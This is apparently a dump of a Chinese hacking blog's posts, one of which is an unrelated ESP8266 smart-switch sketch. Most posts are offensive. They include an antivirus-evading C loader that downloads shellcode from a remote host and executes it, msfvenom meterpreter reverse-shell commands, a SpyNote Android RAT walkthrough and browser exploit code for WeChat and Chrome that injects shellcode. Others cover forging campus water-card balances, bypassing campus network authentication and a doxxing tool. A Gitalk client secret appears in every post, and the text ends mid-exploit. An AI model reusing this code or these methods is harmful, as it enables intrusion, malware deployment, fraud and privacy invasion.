(1)Deauth:因为WIFI管理数据帧没有被加密,导致攻击者可以伪造管理帧,从而让攻击者可以任意发送“取消认证”数据包来强行切断AP与客户端的连接(就是无脑洪水堵塞攻击,一直切断对方设备与机器的连接,从而导致对方设备无法正常连接)。 (2)Beacon:信标帧(Beacon)数据包用于宣告接入点,通过不断发送信标帧数据包(说白点就是创建许多新的wifi干扰对方的正常连接),由于目前部分设备自带SSID检测,所以我们使用随机生成SSID以达到目的。 (3)Probe-response:探测请求帧由用户设备发送,以询问一个已知网络是否在附近。通过请求您在SSID列表中指定的网络,以此来混淆WiFi跟踪器。(就是手机给已知WiFi网络发送一个probe-request帧,可提供网络服务的接入点将响应一个probe-response帧,你的手机将会跟这个响应接入点进行连接,所以看起来跟Deauth攻击差不多)。 (4)钓鱼攻击:通过伪造wifi使受害者连接假冒wifi,通过钓鱼页面等一系列手法可以实现监听流量,获取原真实wifi密码等等,在这里不多赘述和展示了。 漏洞产生原因:802.11 WiFi标准包含一种专门针对网络和连接管理的特殊帧类型,查找wifi时,被动监听WiFi热点所广播出来的“beacon”管理帧(用来表明该热点可用),而“probe-request”,你的设备会发送这种管理帧来查看之前连接过的网络当前是否在周围。如果距离内存在已访问过的网络,相应的热点将会用“probe-response”帧予以响应,这些管理帧存在的问题就是,它们完全没有经过任何的加密,这样做的目的是为了增加WiFi的易用性,因为你完全不需要进行任何的密钥交换或密码确认就可以查看到周围的WiFi网络以及热点名称,但这也增加了WiFi网络的攻击面:任何设备都可以给任何网络发送beacon帧和probe-response帧。 防御措施: 1.将进行wifi攻击的抓到打一顿,一顿不行就继续打(开个玩笑)。 2.将路由器设置发射信道使用5Ghz频段。 3.使用网线连接(手动滑稽)。 4.购买有安全防护功能的大牌路由器。 5.目前还没有什么其他更好的措施,等待新协议标准的出现。 实测 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"c语言免杀加载器","slug":"c语言免杀加载器","date":"2022-11-29T03:45:07.000Z","updated":"2022-11-29T03:52:03.609Z","comments":true,"path":"2022/11/29/c语言免杀加载器/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/c%E8%AF%AD%E8%A8%80%E5%85%8D%E6%9D%80%E5%8A%A0%E8%BD%BD%E5%99%A8/","excerpt":"","text":"#c语言免杀加载器分享一款加载器分离木马payloads测试效果 生产payloads,二进制的payloads 运行上线 测试代码可以用vs2012~vs2022,需要修改部分代码,vs2019好像不用,我是vs2019 12345678910111213141516171819202122232425262728293031323334353637383940414243444546#include "stdafx.h"#include <windows.h>#include <stdlib.h>#include <stdio.h>#include <urlmon.h>#include <string>#include <time.h>using namespace std;#pragma 
comment(linker,"/subsystem:\\"windows\\" /entry:\\"mainCRTStartup\\"")#include <UrlMon.h>#pragma comment(lib,"urlmon.lib")#include <tchar.h>int main(){ Sleep(182); URLDownloadToFile(NULL, _T("http://www.xxxxxx.com/shell.png"), _T("miko.png"), NULL, NULL); Sleep(168); int a; srand((unsigned)time(NULL)); a=rand()%10000+1; FILE *lp; size_t help; unsigned char* shell; Sleep(a); for(int i=0;i<3;i++){a=rand()%10000+1; Sleep(a);} lp=fopen("shell.png","rb"); Sleep(a); fseek(lp,0,SEEK_END); help=ftell(lp); fseek(lp,0,SEEK_SET); shell=(unsigned char*)malloc(help); Sleep(200); fread(shell,help,1,lp); void* exec=VirtualAlloc(0,help,MEM_COMMIT,PAGE_EXECUTE_READWRITE); memcpy(exec,shell,help); ((void(*) ())exec)(); return 0;} 前面的代码生成二进制的图片png,然后把图片放到服务器http://xxxxxx.top/miko.png,然后运行木马,木马会把payload下载到电脑然后执行,二是把图片传到本文件夹在运行这个exe加载器实现加载payload,在没有网的时候把图片放到这个里面,在有网的时候可以让他自己下载然后执行。 #方式二1.msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o mo.py 2.msfvenom -p windows/meterpreter/reverse_tcp LHOST=vuvhz.top LPORT=8888 -e x86/shikata_ga_nai -i 11 –platform windows PrependMigrate=true PrependMigrateProc=svchost.exe -f py -o mo.py自动迁移进程到svchost.exe 3.msfvenom -p windows/meterpreter/reverse_tcp LHOST=vuvhz.top LPORT=443 -e x86/shikata_ga_nai -i 11 –platform windows PrependMigrate=true PrependMigrateProc=svchost.exe PayloadUUIDTracking=true HandlerSSLCert=/home/kali/Desktop/bd/www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f py -o mo.py证书加自动迁移进程到svchost.exe #手机远控无后门版 资源分享 · mikoxihua · 于3年前创建 · 共 281 次阅读https://pan.baidu.com/s/1YeriXnaVpPp90AQJAr9QsA 8m3g 实测可持久,可开机自启,可隐藏#封装windows系统#对于一些需要多次装机的系统进行iso封装,可以减少不必要的麻烦,封装系统环境加所有工具,安装即用#之前用于封装系统,网上找了好多没弄理想,于是在淘宝买了这工具链接:https://pan.baidu.com/s/1IuHJnQPUhM6ZJIx3-ONjVg提取码:secq复制这段内容后打开百度网盘手机App,操作更方便哦 #445检测批量工具下载链接https://pan.baidu.com/s/1-Vgxa13ebY4AyHWyL0nj1gsecq 打开ms17-010批量扫描.bat 更改要扫描的ip段,格式为111.111.%n%.1/24 运行完成后。进入bug文件夹,打开合并bug.bat 然后打开bug.txt 
ctrl+F搜索“成功”。感谢大佬们发的检测工具 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"校园热水卡破解.md","slug":"校园热水卡破解","date":"2022-11-28T00:45:23.000Z","updated":"2022-11-28T00:46:37.253Z","comments":true,"path":"2022/11/28/校园热水卡破解/","link":"","permalink":"http://bo.vuvhz.top/2022/11/28/%E6%A0%A1%E5%9B%AD%E7%83%AD%E6%B0%B4%E5%8D%A1%E7%A0%B4%E8%A7%A3/","excerpt":"","text":"#校园热水卡破解(授权)本测试已经授权#1.需要的工具和设备都不用说了,某宝上可以买到正题#2.测试思路—->查看水卡信息—->找出金额的位置——>然后猜测计算算法—–>写入金额——->白嫖(当然不要违法,校方已经开始想方案了)3.这是没钱时的水卡的信息 4.这是有钱时候的水卡 5.打码的地方是学号和姓名6.发现了刷水前后的变化区域在1扇区,于是开始拿笔计算,没有接触过的我,就查了一下资料,(百度),于是按照大佬的操作测试————————>运气不好,失败告终,无法使用,水卡一直报警参照这个大佬的文章,不行https://www.52pojie.cn/thread-799755-1-1.html7.从以上文章中得出 1234567891011修改数据(每个学校水卡算法不同,此算法不一定适用你的水卡)现在将金额改成333块钱保留两位小数就是333.00去掉点33300转十六进制得8214,然后倒过来得1482然后搞定校验位1482按位取反得0B7D然后替换原金额F460替换成1482原校验位0B9F替换成0B7D (1)校验位 (2)金额 就这俩,于是拿起笔开始看,果不其然,发现我们的水卡是6个十六进制 404B4C 猜测元,角,分 于是开始计算 然后倒写,然后在求校验位,于是按位取反得00BFB4B3,刚开始写入一行,因为水卡一开始两行的数据不一样,于是我写进去后只写了一行,后来一直响,刷水还无限,于是以为金额问题,就在改,可以还是无果,于是不是金额的问题,于是尝试写两行,看到之前那篇文章的大佬也写了两行,于是写了两行后 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) 
gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"安卓远控.md","slug":"安卓远控","date":"2022-11-27T08:58:34.000Z","updated":"2022-11-27T09:02:27.272Z","comments":true,"path":"2022/11/27/安卓远控/","link":"","permalink":"http://bo.vuvhz.top/2022/11/27/%E5%AE%89%E5%8D%93%E8%BF%9C%E6%8E%A7/","excerpt":"","text":"#安卓远控 spynote3.2###安卓远控 spynote3.2 简明使用教程在 freebuf看到 ‘当心,安卓远控(spynote)升级了’#遂下来自己琢磨了下 的确是非常强大 隐藏自身 目前还是过查杀的 希望大家都多多动手 然后发心得到社区中来 多多发表自己的学习心得 技术理解等让我们共同建设好 这片属于我们自己的圈子 效果图# 至少要win7以上 必须安装 .net4.5 4.5以下都不可以 java推荐是 jre 8 .net 安装不对的话 会提示 各种错误一些文件夹不存在 java版本低的话会有各种java 的意外停止 2 配置相关# 顺利打开的话 会提示 设置端口 配置木马#点击左上角 tools – bulid 然后 配置上线地址 端口 等 换个图标试试? 上线效果#上线速度很快 功能很强大 链接:https://pan.baidu.com/s/10kGm5xldOv4u-q7KMw4Vew提取码:1111 还有poc整理https://github.com/Phuong39/2022-HW-POC var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"校园网udp53端口破解免认证","slug":"校园网udp53端口破解免认证","date":"2021-10-12T11:02:27.000Z","updated":"2021-10-12T11:08:41.290Z","comments":true,"path":"2021/10/12/校园网udp53端口破解免认证/","link":"","permalink":"http://bo.vuvhz.top/2021/10/12/%E6%A0%A1%E5%9B%AD%E7%BD%91udp53%E7%AB%AF%E5%8F%A3%E7%A0%B4%E8%A7%A3%E5%85%8D%E8%AE%A4%E8%AF%81/","excerpt":"","text":"#校园网udp53端口破解免认证 安装脚本http://iyandi.xyz/wp-content/uploads/2021/10/openvpn-install-master.zip openvpn下载 http://iyandi.xyz/wp-content/uploads/2021/10/win10-2.4.9.zip 自行翻墙下载,或者使用我的###原理:此方法基本全国百分之80校园网可破解,让大家了解下校园网。本教程适用于校园网以及运营商的CMCC,chinanet,unicom。(任何需要web认证的WiFi)目前校园网破解方案: 利用udp 53/67/68/69/161/5353/6868/636/3389/123/1194 端口上网 IPv4免流上网 drcom共享网络 不排除有其他高阶方案,只列出我所了解的,比如刷路由器固件等等 原理简介 
在连接到某个需要Web认证的热点后(已连接但未验证),我们已经获得了一个内网IP,此时如果我们访问某个HTTP网站,网关会对这个HTTP响应报文劫持并纂改,302重定向给我们一个web认证界面。 网关(或者说交换机)都默认放行DHCP(用于分配IP)和DNS(用于劫持用户数据报)。比如DNS用到的端口是udp53,DHCP用到的端口是udp67,68,67是服务器广播回应端口用户报文应该过不去。 破解方法: 在校外服务器搭建代理(op,dns2等),代理协议udp,代理端口 53/67/68/69/161/5353/6868/636/3389/123/1194等等端口 ###正题1.openvpn服务端安装 bash openvpn-install.sh 2.设置ip 3.名字随便写 如上图配置完成 4.名字随便 5.添加用户名 6.复制配置文件到openvpn客户端连接,一定要关闭防火墙,打开53端口 成功突破校园网,不用在办理非常非常贵的宽带了,太黑了,有些学校是其他端口,搭建服务器该端口就可以了 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"MFC社工利器","slug":"MFC社工利器","date":"2021-09-17T13:50:32.000Z","updated":"2021-09-17T13:51:12.701Z","comments":true,"path":"2021/09/17/MFC社工利器/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/MFC%E7%A4%BE%E5%B7%A5%E5%88%A9%E5%99%A8/","excerpt":"","text":"MFC社工利器就他了,第一个,qq右上角复制qq看点链接# 然后打开我的软件 qq看点到手机号,微博一条龙 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) 
gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"esp8266+blinker+小爱同学控制4到8个设备源码","slug":"esp8266+blinker的app+小爱同学控制4到8个设备源码","date":"2021-09-17T13:48:28.000Z","updated":"2021-09-17T13:48:29.257Z","comments":true,"path":"2021/09/17/esp8266+blinker的app+小爱同学控制4到8个设备源码/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/esp8266+blinker%E7%9A%84app+%E5%B0%8F%E7%88%B1%E5%90%8C%E5%AD%A6%E6%8E%A7%E5%88%B64%E5%88%B08%E4%B8%AA%E8%AE%BE%E5%A4%87%E6%BA%90%E7%A0%81/","excerpt":"","text":"esp8266+blinker的app+小爱同学控制4到8个设备源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295#define BLINKER_MIOT_MULTI_OUTLET //设置为小爱多个插座的模式#define BLINKER_PRINT Serial#define BLINKER_PRINT Serial#define BLINKER_WIFI#include <Blinker.h>#define Socket1 D5#define Socket2 D6#define Socket3 D7#define Socket4 D8char auth[] = "***************";/****秘钥****/char ssid[] = "****************"; //wifi名字char pswd[] = "************"; // wifi密码char Port;int Feedback = 0;int OnorOff = 0;long F_time = 0;int count=0;bool WIFI_Status = true;// 新建组件对象BlinkerButton Button1("k1"); //设置blinkerapp内数据键名BlinkerButton Button2("k2");BlinkerButton Button3("k3");BlinkerButton Button4("k4");void smartConfig()//配网函数{ WiFi.mode(WIFI_STA); Serial.println("\\r\\nWait for Smartconfig..."); 
WiFi.beginSmartConfig();//等待手机端发出的用户名与密码 while (1) { Serial.print("."); digitalWrite(LED_BUILTIN, HIGH); delay(1000); digitalWrite(LED_BUILTIN, LOW); delay(1000); if (WiFi.smartConfigDone())//退出等待 { Serial.println("SmartConfig Success"); Serial.printf("SSID:%s\\r\\n", WiFi.SSID().c_str()); Serial.printf("PSW:%s\\r\\n", WiFi.psk().c_str()); break; } }}void WIFI_Set()//{ //Serial.println("\\r\\n正在连接"); while(WiFi.status()!=WL_CONNECTED) { if(WIFI_Status) { Serial.print("."); digitalWrite(LED_BUILTIN, HIGH); delay(500); digitalWrite(LED_BUILTIN, LOW); delay(500); count++; if(count>=5)//5s { WIFI_Status = false; Serial.println("WiFi连接失败,请用手机进行配网"); } } else { smartConfig(); //微信智能配网 } } /* Serial.println("连接成功"); Serial.print("IP:"); Serial.println(WiFi.localIP());*/}void Set_Butt(int num) //on反馈{ if (num == 1) { Button1.print("on"); } else if (num == 2) { Button2.print("on"); } else if (num == 3) { Button3.print("on"); } else if (num == 4) { Button4.print("on"); } }void Reset_Butt(int num) //off反馈{ if (num == 1) { Button1.print("off"); } else if (num == 2) { Button2.print("off"); } else if (num == 3) { Button3.print("off"); } else if (num == 4) { Button4.print("off"); } }void miotPowerState(const String & state, uint8_t num) //小爱控制函数{ BLINKER_LOG("need set outlet: ", num, ", power state: ", state); if (num == 1) { Feedback = 1; Port = Socket1; //指定每一路开关对应在开发板上的通道接口 } else if (num == 2) { Feedback = 2; Port = Socket2; } else if (num == 3) { Feedback = 3; Port = Socket3; } else if (num == 4) { Feedback = 4; Port = Socket4; } if (state == BLINKER_CMD_ON) { OnorOff = 1; if(num == 0) { Feedback = 5; digitalWrite(Socket1, HIGH); digitalWrite(Socket2, HIGH); digitalWrite(Socket3, HIGH); digitalWrite(Socket4, HIGH); } else { digitalWrite(Port, HIGH); } BlinkerMIOT.powerState("on", num); BlinkerMIOT.print(); } else if (state == BLINKER_CMD_OFF) { OnorOff = 2; if(num == 0) { Feedback = 5; digitalWrite(Socket1, LOW); digitalWrite(Socket2, LOW); digitalWrite(Socket3, LOW); 
digitalWrite(Socket4, LOW); } else { digitalWrite(Port, LOW); } BlinkerMIOT.powerState("off", num); BlinkerMIOT.print(); }}void button1_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket1, HIGH); Button1.print("on"); } if (state == "off") { digitalWrite(Socket1, LOW); Button1.print("off"); }}void button2_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket2, HIGH); Button2.print("on"); } if (state == "off") { digitalWrite(Socket2, LOW); Button2.print("off"); }}void button3_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket3, HIGH); Button3.print("on"); } if (state == "off") { digitalWrite(Socket3, LOW); Button3.print("off"); }}void button4_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket4, HIGH); Button4.print("on"); } if (state == "off") { digitalWrite(Socket4, LOW); Button4.print("off"); }}void setup() { // 初始化串口 Serial.begin(115200);#if defined(BLINKER_PRINT) BLINKER_DEBUG.stream(BLINKER_PRINT);#endif // 初始化有LED的IO pinMode(Socket1, OUTPUT); digitalWrite(Socket1, LOW); pinMode(Socket2, OUTPUT); digitalWrite(Socket2, LOW); pinMode(Socket3, OUTPUT); digitalWrite(Socket3, LOW); pinMode(Socket4, OUTPUT); digitalWrite(Socket4, LOW);//初始化输出低电平 pinMode(LED_BUILTIN, OUTPUT); WIFI_Set(); // 初始化blinker Blinker.begin(auth, WiFi.SSID().c_str(), WiFi.psk().c_str()); Button1.attach(button1_callback);//注册按键回调函数 Button2.attach(button2_callback); Button3.attach(button3_callback); Button4.attach(button4_callback); BlinkerMIOT.attachPowerState(miotPowerState); // BlinkerMIOT.attachPowerState(miotPowerState); digitalWrite(LED_BUILTIN, HIGH);}int i=0;void loop() { Blinker.run(); if(OnorOff == 0) { } else if(OnorOff == 1)//如果是ON状态 { delay(1500); if(Feedback < 5)//小于5 是单独控制 
1-4 { Set_Butt(Feedback);//反馈1-4 OnorOff = 0; }else if(Feedback == 5)//等于5 是打开所有然后1.2s每个的速度反馈所有 { if(millis() - F_time >=1200) { F_time = millis(); i++; Set_Butt(i); i%=4; if(i == 0) //当所有状态反馈完毕则退出 { Feedback = 0; OnorOff = 0; } } } } else if(OnorOff == 2) { delay(1500); if(Feedback < 5)//小于5 是单独控制 1-4 { Reset_Butt(Feedback);//反馈1-4 OnorOff = 0; }else if(Feedback == 5)//等于5 是 关闭 所有然后1.2s每个的速度反馈所有 { if(millis() - F_time >=1200) { F_time = millis(); i++; Reset_Butt(i); i%=4; if(i == 0) //当所有状态反馈完毕则退出 { Feedback = 0; OnorOff = 0; } } } }} var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"微信3.2.11.151Google内核poc利用上线","slug":"微信3-2-11-151Google内核poc利用上线","date":"2021-09-17T13:08:11.000Z","updated":"2021-09-17T13:08:52.670Z","comments":true,"path":"2021/09/17/微信3-2-11-151Google内核poc利用上线/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/%E5%BE%AE%E4%BF%A13-2-11-151Google%E5%86%85%E6%A0%B8poc%E5%88%A9%E7%94%A8%E4%B8%8A%E7%BA%BF/","excerpt":"","text":"[转发]微信最新版本3.2.11.151 Google内核poc利用上线cs方式!微信对版本进行了紧急更新,但是忽略了小程序,依旧可执行shellcode!用的小程序上线的微信,最新版的 1<web-view src="https://www.baidu.com"> </web-view> 测试页面进行上线测试 最新版本的微信 POC没变这里大佬是index.html 引用js代码: 1<script src="test.js"></script> poc代码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154ENABLE_LOG = true;IN_WORKER = true;// run calc and hang in a loopvar shellcode = 
[0x11,0x00,0x21];//前面是例子shellcode替换成自己的 注意是x86的 生成C语言 shellcode 将\\换成“,0” 全部替换后删除首部“,”!function print(data) {}var not_optimised_out = 0;var target_function = (function (value) { if (value == 0xdecaf0) { not_optimised_out += 1; } not_optimised_out += 1; not_optimised_out |= 0xff; not_optimised_out *= 12;});for (var i = 0; i < 0x10000; ++i) { target_function(i);}var g_array;var tDerivedNCount = 17 * 87481 - 8;var tDerivedNDepth = 19 * 19;function cb(flag) { if (flag == true) { return; } g_array = new Array(0); g_array[0] = 0x1dbabe * 2; return 'c01db33f';}function gc() { for (var i = 0; i < 0x10000; ++i) { new String(); }}function oobAccess() { var this_ = this; this.buffer = null; this.buffer_view = null; this.page_buffer = null; this.page_view = null; this.prevent_opt = []; var kSlotOffset = 0x1f; var kBackingStoreOffset = 0xf; class LeakArrayBuffer extends ArrayBuffer { constructor() { super(0x1000); this.slot = this; } } this.page_buffer = new LeakArrayBuffer(); this.page_view = new DataView(this.page_buffer); new RegExp({ toString: function () { return 'a' } }); cb(true); class DerivedBase extends RegExp { constructor() { super( { toString: cb }, 'g' ); this_.buffer = new ArrayBuffer(0x80); g_array[8] = this_.page_buffer; } } var derived_n = eval(`(function derived_n(i) { if (i == 0) { return DerivedBase; } class DerivedN extends derived_n(i-1) { constructor() { super(); return; ${"this.a=0;".repeat(tDerivedNCount)} } } return DerivedN; })`); gc(); new (derived_n(tDerivedNDepth))(); this.buffer_view = new DataView(this.buffer); this.leakPtr = function (obj) { this.page_buffer.slot = obj; return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt); } this.setPtr = function (addr) { this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt); } this.read32 = function (addr) { this.setPtr(addr); return this.page_view.getUint32(0, true, ...this.prevent_opt); } this.write32 = function (addr, value) { this.setPtr(addr); 
this.page_view.setUint32(0, value, true, ...this.prevent_opt); } this.write8 = function (addr, value) { this.setPtr(addr); this.page_view.setUint8(0, value, ...this.prevent_opt); } this.setBytes = function (addr, content) { for (var i = 0; i < content.length; i++) { this.write8(addr + i, content[i]); } } return this;}function trigger() { var oob = oobAccess(); var func_ptr = oob.leakPtr(target_function); print('[*] target_function at 0x' + func_ptr.toString(16)); var kCodeInsOffset = 0x1b; var code_addr = oob.read32(func_ptr + kCodeInsOffset); print('[*] code_addr at 0x' + code_addr.toString(16)); oob.setBytes(code_addr, shellcode); target_function(0);}try{ print("start running"); trigger();}catch(e){ print(e);} 仅用于学习,请不要用于违法犯罪!!!! var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"cs批量爆破","slug":"cs批量爆破","date":"2021-09-17T13:04:28.000Z","updated":"2021-09-17T13:05:28.274Z","comments":true,"path":"2021/09/17/cs批量爆破/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/cs%E6%89%B9%E9%87%8F%E7%88%86%E7%A0%B4/","excerpt":"","text":"cs密码批量爆破显ip显示的更清楚 链接:https://pan.baidu.com/s/1Ht_SCsTIeZM7w-GS8hrhkQ提取码:1234复制这段内容后打开百度网盘手机App,操作更方便哦 之前改的大佬的没有显示ip,然后把ip显示了出来,就不用一个一个去找ip了,结合了单ip破解和多ip破解,ip.txt放ip,pass.txt放密码,结合fofa语句 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) 
gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"google-0day","slug":"google-0day","date":"2021-04-19T08:38:46.000Z","updated":"2021-04-19T08:42:48.619Z","comments":true,"path":"2021/04/19/google-0day/","link":"","permalink":"http://bo.vuvhz.top/2021/04/19/google-0day/","excerpt":"","text":"Cobalt Strike 利用 Chrome 0day 上线c x64POC (弹记事本的): 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103<script> function gc() { for (var i = 0; i < 0x80000; ++i) { var a = new ArrayBuffer(); } } let shellcode = [0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52, 0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72, 0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B, 0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44, 0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41, 0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0, 0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1, 0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44, 0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44, 0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01, 0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41, 0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48, 0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D, 0x01, 0x01, 0x00, 0x00, 0x41, 
0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89, 0xDA, 0xFF, 0xD5, 0x6E, 0x6F, 0x74, 0x65, 0x70, 0x61, 0x64, 0x2E, 0x65, 0x78, 0x65, 0x00]; var wasmCode = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 133, 128, 128, 128, 0, 1, 96, 0, 1, 127, 3, 130, 128, 128, 128, 0, 1, 0, 4, 132, 128, 128, 128, 0, 1, 112, 0, 0, 5, 131, 128, 128, 128, 0, 1, 0, 1, 6, 129, 128, 128, 128, 0, 0, 7, 145, 128, 128, 128, 0, 2, 6, 109, 101, 109, 111, 114, 121, 2, 0, 4, 109, 97, 105, 110, 0, 0, 10, 138, 128, 128, 128, 0, 1, 132, 128, 128, 128, 0, 0, 65, 42, 11]); var wasmModule = new WebAssembly.Module(wasmCode); var wasmInstance = new WebAssembly.Instance(wasmModule); var main = wasmInstance.exports.main; var bf = new ArrayBuffer(8); var bfView = new DataView(bf); function fLow(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(0, true)); } function fHi(f) { bfView.setFloat64(0, f, true); return (bfView.getUint32(4, true)) } function i2f(low, hi) { bfView.setUint32(0, low, true); bfView.setUint32(4, hi, true); return bfView.getFloat64(0, true); } function f2big(f) { bfView.setFloat64(0, f, true); return bfView.getBigUint64(0, true); } function big2f(b) { bfView.setBigUint64(0, b, true); return bfView.getFloat64(0, true); } class LeakArrayBuffer extends ArrayBuffer { 